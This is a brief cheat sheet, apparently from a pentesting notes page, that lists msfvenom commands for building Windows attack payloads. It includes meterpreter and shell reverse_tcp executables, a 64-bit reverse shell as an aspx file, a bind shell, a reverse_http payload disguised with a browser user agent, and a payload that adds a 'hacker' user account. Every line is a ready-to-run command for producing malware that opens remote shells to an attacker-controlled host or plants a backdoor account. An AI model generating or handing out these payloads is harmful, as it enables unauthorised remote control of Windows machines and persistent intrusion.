Windows


===============
>>> msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

==============Fow windows 64 bit version:
>>>msfvenom -p windows/×64/shell_reverse_tcp  LHOST=<OUR_IP>  LPORT=53  -f  aspx -o payload.aspx


================MsfVenom's Gift To Windows :
>>> msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe    
>>> msfvenom -p windows/meterpreter/bind_tcp RHOST= IP LPORT=PORT -f exe > shell.exe    
>>> msfvenom -p windows/shell/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe    
>>> msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe 
>>> msfvenom -p windows/meterpreter_reverse_http LHOST=IP LPORT=PORT HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" -f exe > shell.exe

================Add A New USER : 
>>> msfvenom -p windows/adduser USER=hacker PASS=password -f exe > useradd.exe

Last updated